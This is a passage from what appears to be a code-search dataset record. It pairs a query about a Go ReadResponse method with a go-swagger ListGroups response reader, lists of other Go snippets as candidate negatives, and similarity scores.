err\n\t}\n\n\t// Get the Location header and parse it. The Header will give us the\n\t// Ordinal.\n\tlocation := resp.Header.Get(\"Location\")\n\tif location == \"\" {\n\t\treturn nil, fmt.Errorf(\"Missing Location header.\")\n\t} else if parts := strings.Split(location, \"/\"); len(parts) != 8 {\n\t\treturn nil, fmt.Errorf(\"Malformed Location header.\")\n\t} else if ts, err := strconv.ParseInt(parts[6], 10, 64); err != nil {\n\t\treturn nil, fmt.Errorf(\"Malformed Timestamp in the Location header.\")\n\t} else if ord, err := strconv.ParseInt(parts[7], 10, 64); err != nil {\n\t\treturn nil, fmt.Errorf(\"Malformed Ordinal in the Location header.\")\n\t} else {\n\t\tsecs := ts / 1000\n\t\tnsecs := (ts % 1000) * 1000000\n\t\tevent.Timestamp = time.Unix(secs, nsecs)\n\t\tevent.Ordinal = ord\n\t}\n\n\t// Get the Ref via the Etag header.\n\tif etag := resp.Header.Get(\"Etag\"); etag == \"\" {\n\t\treturn nil, fmt.Errorf(\"Missing ETag header.\")\n\t} else if parts := strings.Split(etag, `\"`); len(parts) != 3 {\n\t\treturn nil, fmt.Errorf(\"Malformed ETag header.\")\n\t} else {\n\t\tevent.Ref = parts[1]\n\t}\n\n\t// Success\n\treturn event, nil\n}", "func (ErrorEvent) Type() EventType {\n\treturn EventError\n}", "func (o GroupDiagnosticsLogAnalyticsOutput) LogType() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v GroupDiagnosticsLogAnalytics) *string { return v.LogType }).(pulumi.StringPtrOutput)\n}", "func (b *Bus) dispatchEvent(event *Event) {\n\thandler, ok := b.eventHandler[event.Etype]\n\tif !ok {\n\t\tlog.Warningf(\"Uninstalled event: %v\\n\", event.Etype)\n\t\treturn\n\t}\n\thandler(event)\n}", "func (this *DateTruncStr) Type() value.Type { return value.STRING }", "func (e event) String() string {\n\treturn fmt.Sprintf(\"%s@%d\", e.AggregateEvent.EventType, e.AggregateEvent.Version)\n}", "func ValueByType(value []byte, varType VarType) (interface{}, error) {\n\tswitch varType {\n\tcase Str:\n\t\tif len(value) == 0 {\n\t\t\treturn defaultValue(Str), nil\n\t\t}\n\n\t\treturn hack.SliceToString(value), nil\n\tcase Num:\n\t\tif len(value) == 0 {\n\t\t\treturn defaultValue(Str), nil\n\t\t}\n\n\t\treturn format.ParseStrInt64(hack.SliceToString(value))\n\tcase Regexp:\n\t\tif len(value) == 0 {\n\t\t\treturn defaultValue(Str), nil\n\t\t}\n\n\t\treturn regexp.Compile(hack.SliceToString(value))\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"%d var type not support\", varType)\n\t}\n}", "func (v Value) Type() Type {\n\treturn v.typ\n}", "func (g *Github) GetEventType(ctx context.Context, r *http.Request) (string, error) {\n\tevent := r.Header.Get(\"X-Github-Event\")\n\tif len(event) == 0 {\n\t\treturn \"\", fmt.Errorf(\"failed to get event type\")\n\t}\n\treturn event, nil\n}", "func (val Value) Type() Type {\n\treturn val.typ\n}", "func LogEvent(thelog StructuredLog, level, event, msg string) {\n\tthelog.Timestamp = time.Now().Format(time.RFC3339)\n\thostname, _ := os.Hostname()\n\tthelog.Server = hostname\n\tthelog.Level = level\n\tthelog.Event = event\n\tthelog.Message = msg\n\t//thelog.Service = \"search-api\"\n\tlogJSON, err := json.Marshal(thelog)\n\tif err != nil {\n\t\tlog.Println(\"Structured Logger: Logger JSON Marshal failed !\")\n\t}\n\tlog.Println(string(logJSON))\n}", "func (s BotAliasHistoryEvent) GoString() string {\n\treturn s.String()\n}", "func (v Value) Type() Type {\n\treturn v.Typ\n}", "func (e *TodoMessageChanged) GetEventType() string {\n\treturn e.EventType\n}", "func (e Event) String() string {\n\tswitch e.Type {\n\tcase EvString:\n\t\treturn fmt.Sprintf(`encoding.%v(%q)`, schemas[e.Type%EvCount].Name, string(e.Data))\n\tcase EvFrequency:\n\t\treturn fmt.Sprintf(`encoding.%v(%v)`, schemas[e.Type%EvCount].Name, e.Args[0])\n\t}\n\treturn fmt.Sprintf(`encoding.%v`, schemas[e.Type%EvCount].Name)\n}", "func qmpEvent(e *libvirt.DomainEvent) (*Event, error) {\n\tvar qe Event\n\n\tif e.Details != nil {\n\t\tif err := json.Unmarshal(e.Details, &qe.Data); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tqe.Event = e.Event\n\tqe.Timestamp.Seconds = int64(e.Seconds)\n\tqe.Timestamp.Microseconds = int64(e.Microseconds)\n\n\treturn &qe, nil\n}", "func GetEventDetailType() *graphql.Object{\n if detailEventType == nil{\n detailEventType = graphql.NewObject(graphql.ObjectConfig{\n Name: \"DetailEventType\",\n Fields: graphql.Fields{\n \"id\": &graphql.Field{\n Type:graphql.Int,\n },\n \"headerId\": &graphql.Field{\n Type:graphql.Int,\n },\n \"entertainmentTicketId\": &graphql.Field{\n Type:graphql.Int,\n },\n \"entertainmentTicket\": &graphql.Field{\n Type: GetEntertainmentTicketType(),\n },\n \"quantity\": &graphql.Field{\n Type:graphql.Int,\n },\n \"type\": &graphql.Field{\n Type:graphql.String,\n },\n },\n })\n }\n return entertainmentTicketType\n}", "func (v *Value) Type() kiwi.ValueType {\n\treturn Type\n}", "func Value(val interface{}, buf []byte) ([]byte, error) {\n\tswitch v := val.(type) {\n\tcase string:\n\t\treturn String(v, buf), nil\n\tcase float64:\n\t\treturn Float64(v, buf)\n\tcase int64:\n\t\treturn Int64(v, buf), nil\n\tcase int:\n\t\treturn Int64(int64(v), buf), nil\n\tcase uint64:\n\t\treturn Uint64(v, buf), nil\n\tcase uint:\n\t\treturn Uint64(uint64(v), buf), nil\n\tcase time.Time:\n\t\treturn Time(v, buf)\n\tcase map[string]interface{}:\n\t\treturn Object(v, buf)\n\tcase []interface{}:\n\t\treturn Array(v, buf)\n\tcase JSONAppender:\n\t\treturn v.AppendJSON(buf)\n\tcase json.Marshaler:\n\t\tbb, err := v.MarshalJSON()\n\t\treturn append(buf, bb...), err\n\t}\n\tbb, err := json.Marshal(val)\n\treturn append(buf, bb...), err\n}", "func (e *TodoRegistered) GetEventType() string {\n\treturn e.EventType\n}", "func TypeSwitcher(event *replication.BinlogEvent) {\n\trebuild.EventHeaderRebuild(event)\n\tswitch event.Header.EventType {\n\tcase replication.GTID_EVENT:\n\t\trebuild.GTIDRebuild(event.Event.(*replication.GTIDEvent))\n\tcase replication.WRITE_ROWS_EVENTv0, replication.WRITE_ROWS_EVENTv1, replication.WRITE_ROWS_EVENTv2:\n\t\trebuild.InsertRebuild(event)\n\tcase replication.UPDATE_ROWS_EVENTv0, replication.UPDATE_ROWS_EVENTv1, replication.UPDATE_ROWS_EVENTv2:\n\t\trebuild.UpdateRebuild(event)\n\tcase replication.DELETE_ROWS_EVENTv0, replication.DELETE_ROWS_EVENTv1, replication.DELETE_ROWS_EVENTv2:\n\t\trebuild.DeleteRebuild(event)\n\tcase replication.QUERY_EVENT:\n\t\trebuild.QueryRebuild(event)\n\tcase replication.ROWS_QUERY_EVENT:\n\t\trebuild.RowsQueryRebuild(event)\n\tcase replication.XID_EVENT:\n\t\trebuild.XidRebuild(event)\n\tcase replication.ROTATE_EVENT:\n\t\tcommon.VerboseVerbose(\"-- [DEBUG] EventType: %s, NextLogName: %s\", event.Header.EventType.String(), string(event.Event.(*replication.RotateEvent).NextLogName))\n\t// case replication.ANONYMOUS_GTID_EVENT, replication.PREVIOUS_GTIDS_EVENT, replication.TABLE_MAP_EVENT:\n\tdefault:\n\t\tcommon.VerboseVerbose(\"-- [DEBUG] TypeSwitcher EventType: %s bypass\", event.Header.EventType.String())\n\t}\n\tsleepInterval(event)\n}", "func Reflect_Value(v interface{}) *vector_tile.Tile_Value {\n\tvar tv *vector_tile.Tile_Value\n\t//fmt.Print(v)\n\tvv := reflect.ValueOf(v)\n\tkd := vv.Kind()\n\tif (reflect.Float64 == kd) || (reflect.Float32 == kd) {\n\t\t//fmt.Print(v, \"float\", k)\n\t\ttv = Make_Tv_Float(float64(vv.Float()))\n\t\t//hash = Hash_Tv(tv)\n\t} else if (reflect.Int == kd) || (reflect.Int8 == kd) || (reflect.Int16 == kd) || (reflect.Int32 == kd) || (reflect.Int64 == kd) || (reflect.Uint8 == kd) || (reflect.Uint16 == kd) || (reflect.Uint32 == kd) || (reflect.Uint64 == kd) {\n\t\t//fmt.Print(v, \"int\", k)\n\t\ttv = Make_Tv_Int(int(vv.Int()))\n\t\t//hash = Hash_Tv(tv)\n\t} else if reflect.String == kd {\n\t\t//fmt.Print(v, \"str\", k)\n\t\ttv = Make_Tv_String(string(vv.String()))\n\t\t//hash = Hash_Tv(tv)\n\n\t} else {\n\t\ttv := new(vector_tile.Tile_Value)\n\t\tt := \"\"\n\t\ttv.StringValue = &t\n\t}\n\treturn tv\n}", "func (d *dbBase) collectFieldValue(mi *modelInfo, fi *fieldInfo, ind reflect.Value, insert bool, tz *time.Location) (interface{}, error) {\n\tvar value interface{}\n\tif fi.pk {\n\t\t_, value, _ = getExistPk(mi, ind)\n\t} else {\n\t\tfield := ind.FieldByIndex(fi.fieldIndex)\n\t\tif fi.isFielder {\n\t\t\tf := field.Addr().Interface().(Fielder)\n\t\t\tvalue = f.RawValue()\n\t\t} else {\n\t\t\tswitch fi.fieldType {\n\t\t\tcase TypeBooleanField:\n\t\t\t\tif nb, ok := field.Interface().(sql.NullBool); ok {\n\t\t\t\t\tvalue = nil\n\t\t\t\t\tif nb.Valid {\n\t\t\t\t\t\tvalue = nb.Bool\n\t\t\t\t\t}\n\t\t\t\t} else if field.Kind() == reflect.Ptr {\n\t\t\t\t\tif field.IsNil() {\n\t\t\t\t\t\tvalue = nil\n\t\t\t\t\t} else {\n\t\t\t\t\t\tvalue = field.Elem().Bool()\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\tvalue = field.Bool()\n\t\t\t\t}\n\t\t\tcase TypeVarCharField, TypeCharField, TypeTextField, TypeJSONField, TypeJsonbField:\n\t\t\t\tif ns, ok := field.Interface().(sql.NullString); ok {\n\t\t\t\t\tvalue = nil\n\t\t\t\t\tif ns.Valid {\n\t\t\t\t\t\tvalue = ns.String\n\t\t\t\t\t}\n\t\t\t\t} else if field.Kind() == reflect.Ptr {\n\t\t\t\t\tif field.IsNil() {\n\t\t\t\t\t\tvalue = nil\n\t\t\t\t\t} else {\n\t\t\t\t\t\tvalue = field.Elem().String()\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\tvalue = field.String()\n\t\t\t\t}\n\t\t\tcase TypeFloatField, TypeDecimalField:\n\t\t\t\tif nf, ok := field.Interface().(sql.NullFloat64); ok {\n\t\t\t\t\tvalue = nil\n\t\t\t\t\tif nf.Valid {\n\t\t\t\t\t\tvalue = nf.Float64\n\t\t\t\t\t}\n\t\t\t\t} else if field.Kind() == reflect.Ptr {\n\t\t\t\t\tif field.IsNil() {\n\t\t\t\t\t\tvalue = nil\n\t\t\t\t\t} else {\n\t\t\t\t\t\tvalue = field.Elem().Float()\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\tvu := field.Interface()\n\t\t\t\t\tif _, ok := vu.(float32); ok {\n\t\t\t\t\t\tvalue, _ = StrTo(ToStr(vu)).Float64()\n\t\t\t\t\t} else {\n\t\t\t\t\t\tvalue = field.Float()\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\tcase TypeTimeField, TypeDateField, TypeDateTimeField:\n\t\t\t\tvalue = field.Interface()\n\t\t\t\tif t, ok := value.(time.Time); ok {\n\t\t\t\t\td.ins.TimeToDB(&t, tz)\n\t\t\t\t\tif t.IsZero() {\n\t\t\t\t\t\tvalue = nil\n\t\t\t\t\t} else {\n\t\t\t\t\t\tvalue = t\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\tswitch {\n\t\t\t\tcase fi.fieldType&IsPositiveIntegerField > 0:\n\t\t\t\t\tif field.Kind() == reflect.Ptr {\n\t\t\t\t\t\tif field.IsNil() {\n\t\t\t\t\t\t\tvalue = nil\n\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\tvalue = field.Elem().Uint()\n\t\t\t\t\t\t}\n\t\t\t\t\t} else {\n\t\t\t\t\t\tvalue = field.Uint()\n\t\t\t\t\t}\n\t\t\t\tcase fi.fieldType&IsIntegerField > 0:\n\t\t\t\t\tif ni, ok := field.Interface().(sql.NullInt64); ok {\n\t\t\t\t\t\tvalue = nil\n\t\t\t\t\t\tif ni.Valid {\n\t\t\t\t\t\t\tvalue = ni.Int64\n\t\t\t\t\t\t}\n\t\t\t\t\t} else if field.Kind() == reflect.Ptr {\n\t\t\t\t\t\tif field.IsNil() {\n\t\t\t\t\t\t\tvalue = nil\n\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\tvalue = field.Elem().Int()\n\t\t\t\t\t\t}\n\t\t\t\t\t} else {\n\t\t\t\t\t\tvalue = field.Int()\n\t\t\t\t\t}\n\t\t\t\tcase fi.fieldType&IsRelField > 0:\n\t\t\t\t\tif field.IsNil() {\n\t\t\t\t\t\tvalue = nil\n\t\t\t\t\t} else {\n\t\t\t\t\t\tif _, vu, ok := getExistPk(fi.relModelInfo, reflect.Indirect(field)); ok {\n\t\t\t\t\t\t\tvalue = vu\n\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\tvalue = nil\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tif !fi.null && value == nil {\n\t\t\t\t\t\treturn nil, fmt.Errorf(\"field `%s` cannot be NULL\", fi.fullName)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tswitch fi.fieldType {\n\t\tcase TypeTimeField, TypeDateField, TypeDateTimeField:\n\t\t\tif fi.autoNow || fi.autoNowAdd && insert {\n\t\t\t\tif insert {\n\t\t\t\t\tif t, ok := value.(time.Time); ok && !t.IsZero() {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\ttnow := time.Now()\n\t\t\t\td.ins.TimeToDB(&tnow, tz)\n\t\t\t\tvalue = tnow\n\t\t\t\tif fi.isFielder {\n\t\t\t\t\tf := field.Addr().Interface().(Fielder)\n\t\t\t\t\tf.SetRaw(tnow.In(DefaultTimeLoc))\n\t\t\t\t} else if field.Kind() == reflect.Ptr {\n\t\t\t\t\tv := tnow.In(DefaultTimeLoc)\n\t\t\t\t\tfield.Set(reflect.ValueOf(&v))\n\t\t\t\t} else {\n\t\t\t\t\tfield.Set(reflect.ValueOf(tnow.In(DefaultTimeLoc)))\n\t\t\t\t}\n\t\t\t}\n\t\tcase TypeJSONField, TypeJsonbField:\n\t\t\tif s, ok := value.(string); (ok && len(s) == 0) || value == nil {\n\t\t\t\tif fi.colDefault && fi.initial.Exist() {\n\t\t\t\t\tvalue = fi.initial.String()\n\t\t\t\t} else {\n\t\t\t\t\tvalue = nil\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn value, nil\n}" ]
[ "0.5817425", "0.5224016", "0.5199794", "0.5174661", "0.50340146", "0.49963158", "0.4947979", "0.48776007", "0.4869081", "0.48292866", "0.47609672", "0.47547865", "0.4714412", "0.46656308", "0.46602678", "0.4621549", "0.45972863", "0.45967934", "0.4589144", "0.4566101", "0.45597684", "0.45135134", "0.44960475", "0.44777465", "0.44630805", "0.4426621", "0.4426621", "0.4426621", "0.4426621", "0.4426621", "0.44175074", "0.441702", "0.44138616", "0.44082782", "0.44047803", "0.44035143", "0.44016346", "0.4394589", "0.43891132", "0.43764454", "0.43652204", "0.43652204", "0.43557435", "0.43552303", "0.43552303", "0.43552303", "0.43552303", "0.43545622", "0.4351818", "0.43477505", "0.43439662", "0.4338415", "0.43378082", "0.4324993", "0.4313553", "0.43097013", "0.43077096", "0.43076137", "0.430103", "0.4299862", "0.4295457", "0.4295093", "0.42925775", "0.42761755", "0.4266403", "0.42567927", "0.42437217", "0.4229707", "0.42249453", "0.4222405", "0.42037243", "0.4194834", "0.41867363", "0.41864386", "0.41793656", "0.41783923", "0.41767955", "0.4171245", "0.416989", "0.41616946", "0.4159501", "0.4159387", "0.4158279", "0.4152747", "0.41500023", "0.41488364", "0.4148442", "0.41461357", "0.41351762", "0.4133988", "0.41321462", "0.41233024", "0.4119956", "0.41143054", "0.41094273", "0.41028252", "0.4098146", "0.4095679", "0.40946296", "0.40935093" ]
0.7790924
0
ReadResponse reads a server response into the received o.
func (o *ListGroupsReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) { switch response.Code() { case 200: result := NewListGroupsOK() if err := result.readResponse(response, consumer, o.formats); err != nil { return nil, err } return result, nil case 400: result := NewListGroupsBadRequest() if err := result.readResponse(response, consumer, o.formats); err != nil { return nil, err } return nil, result case 403: result := NewListGroupsForbidden() if err := result.readResponse(response, consumer, o.formats); err != nil { return nil, err } return nil, result case 404: result := NewListGroupsNotFound() if err := result.readResponse(response, consumer, o.formats); err != nil { return nil, err } return nil, result case 500: result := NewListGroupsInternalServerError() if err := result.readResponse(response, consumer, o.formats); err != nil { return nil, err } return nil, result default: result := NewListGroupsDefault(response.Code()) if err := result.readResponse(response, consumer, o.formats); err != nil { return nil, err } if response.Code()/100 == 2 { return result, nil } return nil, result } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (d *ResourceHandler) ReadResponse(dataOut unsafe.Pointer, bytesToRead int32, bytesRead *int32, callback *Callback) int32 {\n\treturn lookupResourceHandlerProxy(d.Base()).ReadResponse(d, dataOut, bytesToRead, bytesRead, callback)\n}", "func (o *GetServerReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetServerOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *InteractionBindReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewInteractionBindOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 404:\n\t\tresult := NewInteractionBindNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tcase 500:\n\t\tresult := NewInteractionBindInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *InteractionUnbindReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewInteractionUnbindOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 404:\n\t\tresult := NewInteractionUnbindNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tcase 500:\n\t\tresult := NewInteractionUnbindInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (r *ResponseReader) ReadResponse(req *Request) (res *Response, err error) {\n\tres = CreateEmptyResponse(req)\n\t_, err = readFirstLine(r, res)\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = readHeaders(r, res)\n\tif err != nil {\n\t\treturn\n\t}\n\n\t_, err = readBodyContent(r, res)\n\tif err != nil {\n\t\treturn\n\t}\n\treturn res, nil\n}", "func (c *Conn) ReadResponse(rmsg *Response) error {\n\tdata, err := c.ReadDataUnit()\n\tif err != nil {\n\t\treturn err\n\t}\n\tcolor.Printf(\"@{c}<!-- RESPONSE -->\\n%s\\n\\n\", string(data))\n\terr = xml.Unmarshal(data, rmsg)\n\tif err != nil {\n\t\treturn err\n\t}\n\t// color.Fprintf(os.Stderr, \"@{y}%s\\n\", spew.Sprintf(\"%+v\", msg))\n\tif len(rmsg.Results) != 0 {\n\t\tr := rmsg.Results[0]\n\t\tif r.IsError() {\n\t\t\treturn r\n\t\t}\n\t}\n\treturn nil\n}", "func (o *VerifyConnectionReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewVerifyConnectionOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *GetAvailableReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewGetAvailableOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *ClosePositionReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewClosePositionOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tcase 400:\n\t\tresult := NewClosePositionBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tcase 401:\n\t\tresult := NewClosePositionUnauthorized()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tcase 404:\n\t\tresult := NewClosePositionNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tcase 405:\n\t\tresult := NewClosePositionMethodNotAllowed()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *DescribeServerReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewDescribeServerOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewDescribeServerBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 404:\n\t\tresult := NewDescribeServerNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 409:\n\t\tresult := NewDescribeServerConflict()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 500:\n\t\tresult := NewDescribeServerInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"response status code does not match any response statuses defined for this endpoint in the swagger spec\", response, response.Code())\n\t}\n}", "func (o *GetServerSessionReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetServerSessionOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewGetServerSessionBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 401:\n\t\tresult := NewGetServerSessionUnauthorized()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 404:\n\t\tresult := NewGetServerSessionNotFound()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 500:\n\t\tresult := NewGetServerSessionInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\tdata, err := ioutil.ReadAll(response.Body())\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treturn nil, fmt.Errorf(\"Requested GET /dsmcontroller/namespaces/{namespace}/servers/{podName}/session returns an error %d: %s\", response.Code(), string(data))\n\t}\n}", "func (o *StartReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 200:\n\t\tresult := NewStartOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (resp *PharosResponse) readResponse() {\n\tif !resp.hasBeenRead && resp.Response != nil && resp.Response.Body != nil {\n\t\tresp.data, resp.Error = ioutil.ReadAll(resp.Response.Body)\n\t\tresp.Response.Body.Close()\n\t\tresp.hasBeenRead = true\n\t}\n}", "func (o *HelloWorldReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewHelloWorldOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 400:\n\t\tresult := NewHelloWorldBadRequest()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 500:\n\t\tresult := NewHelloWorldInternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (reader *BasicRpcReader) ReadResponse(r io.Reader, method string, requestID int32, resp proto.Message) error {\n\trrh := &hadoop.RpcResponseHeaderProto{}\n\terr := readRPCPacket(r, rrh, resp)\n\tif err != nil {\n\t\treturn err\n\t} else if int32(rrh.GetCallId()) != requestID {\n\t\treturn errors.New(\"unexpected sequence number\")\n\t} else if rrh.GetStatus() != hadoop.RpcResponseHeaderProto_SUCCESS {\n\t\treturn &NamenodeError{\n\t\t\tmethod: method,\n\t\t\tmessage: rrh.GetErrorMsg(),\n\t\t\tcode: int(rrh.GetErrorDetail()),\n\t\t\texception: rrh.GetExceptionClassName(),\n\t\t}\n\t}\n\n\treturn nil\n}", "func (o *UpdateAntivirusServerReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\n\tcase 204:\n\t\tresult := NewUpdateAntivirusServerNoContent()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\n\tdefault:\n\t\tresult := NewUpdateAntivirusServerDefault(response.Code())\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif response.Code()/100 == 2 {\n\t\t\treturn result, nil\n\t\t}\n\t\treturn nil, result\n\t}\n}", "func (o *HasEventsReader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewHasEventsOK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 401:\n\t\tresult := NewHasEventsUnauthorized()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\tcase 403:\n\t\tresult := NewHasEventsForbidden()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *GetV2Reader) ReadResponse(response runtime.ClientResponse, consumer runtime.Consumer) (interface{}, error) {\n\tswitch response.Code() {\n\tcase 200:\n\t\tresult := NewGetV2OK()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn result, nil\n\tcase 500:\n\t\tresult := NewGetV2InternalServerError()\n\t\tif err := result.readResponse(response, consumer, o.formats); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn nil, result\n\n\tdefault:\n\t\treturn nil, runtime.NewAPIError(\"unknown error\", response, response.Code())\n\t}\n}", "func (o *SaveReader) 